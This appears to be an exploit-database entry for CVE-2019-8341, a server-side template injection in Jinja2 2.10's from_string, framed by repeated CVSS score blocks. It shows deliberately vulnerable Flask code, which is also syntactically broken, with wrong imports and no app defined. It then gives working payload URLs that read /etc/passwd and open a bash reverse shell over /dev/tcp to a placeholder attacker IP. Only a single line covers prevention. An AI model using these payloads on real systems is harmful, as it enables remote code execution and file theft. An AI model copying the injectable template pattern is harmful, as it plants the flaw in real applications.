9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Jinja2 2.10 - from_string Server Side Template Injection
'''
# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341
// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.
//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:
'''
import Flask
import request
import Jinja2
@app.route("/")
def index():
username = request.values.get('username')
return Jinja2.from_string('Hello ' + username).render()
if __name__ == "__main__":
app.run(host='127.0.0.1' , port=4444)
'''
POC
//Exploiting the username param
http://localhost:4444/?username={{4*4}}
OUTPUT: Hello 16
Reading the /etc/passwd
http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
How to prevent it:
Never let the user provide template content.
'''
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P